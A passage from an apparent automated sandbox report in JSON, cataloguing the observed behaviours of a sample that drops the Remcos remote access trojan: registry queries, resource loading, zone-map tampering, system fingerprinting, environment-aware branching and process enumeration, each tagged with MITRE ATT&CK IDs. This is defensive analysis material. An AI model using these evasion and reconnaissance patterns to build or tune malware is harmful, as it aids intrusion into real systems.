\"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"P:\\HFREF\\UNCHOJF\\NCCQNGN\\YBPNY\\GRZC\\{01OSNOQP-4NOP-41QN-NP0R-1QR29SP2N349}\\.PE\\CLGUBA-3.6.3.RKR\"; Value: \"\")\n \"file.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"ZVPEBFBSG.JVAQBJF.PBAGEBYCNARY.GNFXONE\"; Value: \"\")\n \"file.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\\EHAQYY32.RKR\"; Value: \"\")\n \"file.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"P:\\HFREF\\UNCHOJF\\NCCQNGN\\YBPNY\\GRZC\\UNAPBZRFQ\\VAFGNYY\\IPERQVFG_K86.RKR\"; Value: \"\")\n \"file.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"ZVPEBFBSG.JVAQBJF.JVAQBJFVAFGNYYRE\"; Value: \"\")\n \"file.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\\UAP\\UBSSVPR9\\OVA\\UJC.RKR\"; Value: \"\")\n \"file.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\\UAP\\UAPHGVYF\\HCQNGR\\UAPHCQNGR90.RKR\"; Value: \"\")\n \"file.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"P:\\GRZC\\UAPQBJAYBNQ\\CERCNERVAFGNYYGRZC\\UAPHCQNGR\\UAPFRYSHCQNGR.RKR\"; Value: \"\")\n \"file.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\USERASSIST\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\COUNT\"; Key: \"ZVPEBFBSG.JVAQBJF.FURYY.EHAQVNYBT\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"remcos.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"dism.log\" has type \"Unicode text UTF-8 (with BOM) text with very long lines (312) with CRLF line terminators\"- [targetUID: N/A]\n \"DISMHOST.EXE.6712E6A3.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"json_1_.json\" has type \"JSON data\"- [targetUID: N/A]\n \"remcos.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%ALLUSERSPROFILE%\\tst\\remcos.exe]- [targetUID: 00000000-00005804]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"file.exe\" called \"FindResourceA\" with parameter \"4639268\" - (UID: 00000000-00005804)\n \"file.exe\" called \"FindResourceW\" with parameter \"789\" - (UID: 00000000-00005804)\n \"remcos.exe\" called \"FindResourceA\" with parameter \"4639268\" - (UID: 00000000-00005888)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"file.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4690264'}\" (UID: 00000000-00005804)\n \"file.exe\" called \"LoadResource with parameter {'hModule': '1856241664', 'hResInfo': '1856249984'}\" (UID: 00000000-00005804)\n \"file.exe\" called \"LoadResource with parameter {'hModule': '268435456', 'hResInfo': '268493040'}\" (UID: 00000000-00005804)\n \"file.exe\" called \"LoadResource with parameter {'hModule': '1877409792', 'hResInfo': '1877522704'}\" (UID: 00000000-00005804)\n \"file.exe\" called \"LoadResource with parameter {'hModule': '41287681', 'hResInfo': '41414112'}\" (UID: 00000000-00005804)\n \"file.exe\" called \"LoadResource with parameter {'hModule': '41287681', 'hResInfo': '41388112'}\" (UID: 00000000-00005804)\n \"remcos.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4690264'}\" (UID: 00000000-00005888)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"file.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"file.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebc976c0021b0000e0fd7f9a5c167700f0fd7f00c6120044e0fd7f00000000400000003f0000002000000000e0fd7ff4c51200c15c167760821d772000000000e0fd7f9a5c167700f0fd7f18c612005789157780831d7713170975d8ebc976 (UID: 00000000-00005804)\n \"file.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b20310000a4362400100000001c00000028de12002cdf12007ac8156f08000000ac4e147793790875ffffffff90de1200000000007cde12000010000004000000002000009cde1200bf790875ffffffff00002302000023020010000004000000d4de1200000013006ee9e96e00002302ff000000 (UID: 00000000-00005804)\n \"file.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100205061636b20310000a4362400100000001c00000028de12002cdf12007ac8156f08000000ac4e147793790875ffffffff90de1200000000007cde12000010000004000000002000009cde1200bf790875ffffffff00002302000023020010000004000000d4de1200000013006ee9e96e (UID: 00000000-00005804)\n \"file.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b203100205061636b203100205061636b20310000a4362400100000001c00000028de12002cdf12007ac8156f08000000ac4e147793790875ffffffff90de1200000000007cde12000010000004000000002000009cde1200bf790875ffffffff00002302000023020010000004000000d4de1200 (UID: 00000000-00005804)\n \"file.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000095e11177db240700fefffffff5f61577634d1677f0201600a857196b40461900b2f41577c7f200774cdf12000000186b0000186b804d167723f30077e0000000e000186b00000000b8de1200e412186b4ce0120000000000010000001cdf120040f51577000000000000000008df1200 (UID: 00000000-00005804)\n \"file.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005804)\n \"file.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005804)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call GetTimeZoneInformation@KERNEL32.DLL directly followed by \"cmp eax, FFFFFFFFh\" and \"je 00449511h\" at 00000000-00005888-39370-1066-004493E5\n Found API call EnumServicesStatusW@ADVAPI32.DLL directly followed by \"cmp dword ptr [esp+14h], esi\" and \"jbe 0041AAABh\" at 00000000-00005888-39370-1964-0041A7D9", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"file.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005804)\n \"file.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005804)\n \"file.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036002c09215498da12006d8238758cf21a0004010000 (UID: 00000000-00005804)\n \"file.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ff2b157773e90077d8ebc976ac01160000001600000000000000000022005200030000000000000000000000000000000000000023004d00030000000000000000000000186e160000000000200000000000000000000000 (UID: 00000000-00005804)\n \"file.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000008400c20000009c501477556c16771b007500c200000019007f00c2000000186e1600dd571677186e160000000000200000001fc8007700000000208b1b00086b1600286c1600b8891c00d06f16000c00a5025ce312009ce3120004e5120095e1117723300700feffffffff2b15779a2a1577a88f1c0000000000000000000100000000000000408b1b00086b1600246c1600a88f1c00686f1600f054ed83a8e31200b16e726f04e5120095e1117723300700feffffffff2b15779a2a15772c9bad75000000002c9bad75000000000200000000000000a88f1c00b8891c00a88f1c00 (UID: 00000000-00005804)\n \"file.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001e002cd81200b344ba6805000000000000000000000000000000000000000000000000000000d402000000000000000000000000000044df120043d02354e8dc1200e8dc12005ecbb775d402000000000000005db57544df12000e5db575dcda1200dcaab975010000000000000072000000ffffffffffffffff64d8120078020000000000002500000064d812007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600c80b2154bcd812006d823875e44b200004010000 (UID: 00000000-00005804)\n \"file.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000ffff2a002e0015000000620bb77500000000186e160000000000500000001c5b1e000200000068341a000000000001000008f0c81d0040721600380bb775f0d6120002000000a017000000001600d04b2000f83b0000ff07000000001600000000007f070000c4001600e82d160082300000d0d7120067e5127700001600d04b20000000000000001600000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600a404215410d812006d823875e44b200004010000 (UID: 00000000-00005804)\n \"file.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036005c02215428d112006d8238752456200004010000 (UID: 00000000-00005804)\n \"file.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001d00ccc21200b344ba6809000000000000000000000000000000000000000000000000000000d4020000000000000000000000000000e4c91200e3c5235488c7120088c712005ecbb775d402000000000000005db575e4c912000e5db5757cc51200dcaab97501000000000000007a000000ffffffffffffffff04c3120078020000000000002500000004c312007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600681021545cc312006d8238751c65200004010000 (UID: 00000000-00005804)\n \"file.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000160000200000b8601b00c4c212000464157738011600e0631577f7ee00770000000000001600c0601b000000000082281577340000c0f0c11200a01700000000160008652000f83b0000ff07000000001600000000007f070000c4001600e82d16005b2d000070c2120067e5127700001600086520000000000000001600000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600c4112154b0c212006d823875cc601b0004010000 (UID: 00000000-00005804)\n \"file.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600fc682154c8bb12006d8238751c65200004010000 (UID: 00000000-00005804)\n \"file.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000019001cb81200b344ba680a000000000000000000000000000000000000000000000000000000d402000000000000000000000000000034bf120053b02354d8bc1200d8bc12005ecbb775d402000000000000005db57534bf12000e5db575ccba1200dcaab97501000000000000007c000000ffffffffffffffff54b8120078020000000000002500000054b812007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600d86b2154acb812006d8238756c75200004010000 (UID: 00000000-00005804)\n \"file.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002000003b000000001600000000008077200010b812000464157738011600e06315770200000068341a000000000001000008d4b6120000000001bcc71d77c0c71d770a000000a01700000000160058752000f83b0000ff07000000001600000000007f070000c4001600e82d1600512b0000c0b7120067e5127700001600587520000000000000001600000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600b464215400b812006d8238756c75200004010000 (UID: 00000000-00005804)\n \"file.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001e002cd81200b344ba6805000000000000000000000000000000000000000000000000000000fc02000000000000000000000000000044df120043d02354e8dc1200e8dc12005ecbb775fc02000000000000005db57544df12000e5db575dcda1200dcaab975010000000000000072000000ffffffffffffffff64d8120078020000000000002500000064d812007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600c80b2154bcd812006d823875a420210004010000 (UID: 00000000-00005804)\n \"file.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000ffff2900390027000000620bb77500000000186e160000000000500000001c5b1e000200000068341a00000000000100000848c91d0040721600380bb775f0d6120002000000a4d712003f0878750200000068341a00000000000100001888fb777594d71200c81cb9756ad9120095fb7775c8d8120068341a0000000000000000000000000050d81200000016007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600a404215410d812006d823875a420210004010000 (UID: 00000000-00005804)\n \"file.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036005c02215428d112006d823875a420210004010000 (UID: 00000000-00005804)\n \"file.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001d00ccc21200b344ba6809000000000000000000000000000000000000000000000000000000fc020000000000000000000000000000e4c91200e3c5235488c7120088c712005ecbb775fc02000000000000005db575e4c912000e5db5757cc51200dcaab97501000000000000007a000000ffffffffffffffff04c3120078020000000000002500000004c312007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600681021545cc312006d8238752cd0210004010000 (UID: 00000000-00005804)\n \"file.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000014010000010000000000000001cf6d6c0c6c7056657273696f6e496e666f726d6174696f6e000000000000000000000000000000000000000000008fc5235494c11200c01900000000160018d02100f83b0000ff07000000001600000000007f070000c4001600e82d1600f921000070c2120067e512770000160018d021000000000000001600000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600c4112154b0c212006d8238752cd0210004010000 (UID: 00000000-00005804)\n \"file.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600fc682154c8bb12006d8238752cd4210004010000 (UID: 00000000-00005804)\n \"file.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001e001cb81200b344ba680a000000000000000000000000000000000000000000000000000000fc02000000000000000000000000000034bf120053b02354d8bc1200d8bc12005ecbb775fc02000000000000005db57534bf12000e5db575ccba1200dcaab97501000000000000007c000000ffffffffffffffff54b8120078020000000000002500000054b812007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600d86b2154acb812006d82387554d6210004010000 (UID: 00000000-00005804)\n \"file.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002100003b00000000160000000000e0da210010b812000464157738011600e06315770200000068341a000000000001000008d4b6120072006f01bcc71d77c0c71d770a00000094b712003f0878750200000068341a00000000000100001888fb777584b71200c81cb9755ab9120095fb7775b8b8120068341a0000000000000000000000000040b81200000016007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600b464215400b812006d82387554d6210004010000 (UID: 00000000-00005804)\n \"file.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002000c4b21200b344ba6808000000000000000000000000000000000000000000000000000000fc020000000000000000000000000000dcb91200fbb5235480b7120080b712005ecbb775fc02000000000000005db575dcb912000e5db57574b51200dcaab975010000000000000078000000fffffffffffffffffcb21200780200000000000025000000fcb212007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036006060215454b312006d823875f4da210004010000 (UID: 00000000-00005804)\n \"file.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002100003b0000000016000000000080e02100b8b212000464157738011600e06315770200000068341a0000000000010000087cb1120000000001bcc71d77c0c71d770a0000003cb212003f0878750200000068341a00000000000100001888fb77752cb21200c81cb97502b4120095fb777560b3120068341a00000000000000000000000000e8b21200000016007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600dc612154a8b212006d823875f4da210004010000 (UID: 00000000-00005804)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"file.exe\" called \"IsWow64Process\" with parameter \"5804\" - (UID: 00000000-00005804)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"file.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005804)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"file.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005804)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"file.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00005804)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"file.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005804)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-13", "type": 3, "relevance": 3, "name": "Reads the windows installation date", "description": "\"file.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\"; Key: \"INSTALLDATE\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"file.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"file.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\REMCOS.EXE\")\n \"file.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\REMCOS.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"file.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"file.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API's typically used for searching a directory for a files", "description": "\"file.exe\" called \"FindFirstFileW\" with parameter %PROGRAMFILES%\\MICROS~3\\Office14\\*.* (UID: 00000000-00005804)\n \"file.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005804)\n \"file.exe\" called \"FindNextFileW\" with parameter 1033 (UID: 00000000-00005804)\n \"file.exe\" called \"FindNextFileW\" with parameter 1036 (UID: 00000000-00005804)\n \"file.exe\" called \"FindNextFileW\" with parameter 3082 (UID: 00000000-00005804)\n \"file.exe\" called \"FindNextFileW\" with parameter ACCDDS.DLL (UID: 00000000-00005804)\n \"file.exe\" called \"FindNextFileW\" with parameter ACCDDSF.DLL (UID: 00000000-00005804)\n \"file.exe\" called \"FindNextFileW\" with parameter ACCDDSLM.DLL (UID: 00000000-00005804)\n \"file.exe\" called \"FindNextFileW\" with parameter AccessWeb (UID: 00000000-00005804)\n \"file.exe\" called \"FindNextFileW\" with parameter ACCICONS.EXE (UID: 00000000-00005804)\n \"file.exe\" called \"FindNextFileW\" with parameter ACCVDT.DLL (UID: 00000000-00005804)\n \"file.exe\" called \"FindNextFileW\" with parameter ACCWIZ (UID: 00000000-00005804)\n \"file.exe\" called \"FindNextFileW\" with parameter ACCWIZ.DLL (UID: 00000000-00005804)\n \"file.exe\" called \"FindNextFileW\" with parameter ACEDAO.DLL (UID: 00000000-00005804)\n \"file.exe\" called \"FindNextFileW\" with parameter ADDINS (UID: 00000000-00005804)\n \"file.exe\" called \"FindNextFileW\" with parameter ADVCMP.DIC (UID: 00000000-00005804)\n \"file.exe\" called \"FindNextFileW\" with parameter ADVTEL.DIC (UID: 00000000-00005804)\n \"file.exe\" called \"FindNextFileW\" with parameter ADVZIP.DIC (UID: 00000000-00005804)\n \"file.exe\" called \"FindNextFileW\" with parameter ASCIIENG.LNG (UID: 00000000-00005804)\n \"file.exe\" called \"FindNextFileW\" with parameter AUDIOSEARCHLTS.DLL (UID: 00000000-00005804)\n \"file.exe\" called \"FindNextFileW\" with parameter AUDIOSEARCHMAIN.DLL (UID: 00000000-00005804)\n \"file.exe\" called \"FindNextFileW\" with parameter AUDIOSEARCHSAPIFE.DLL (UID: 00000000-00005804)\n \"file.exe\" called \"FindNextFileW\" with parameter AUTHZAX.DLL (UID: 00000000-00005804)\n \"file.exe\" called \"FindNextFileW\" with parameter BCSAutogen.dll (UID: 00000000-00005804)\n \"file.exe\" called \"FindNextFileW\" with parameter BCSClient.Msg.dll (UID: 00000000-00005804)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "registry-111", "type": 3, "relevance": 3, "name": "Tries to retrieve default browser", "description": "\"remcos.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\HTTP\\SHELL\\OPEN\\COMMAND\"; Key: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"file.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"remcos.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, 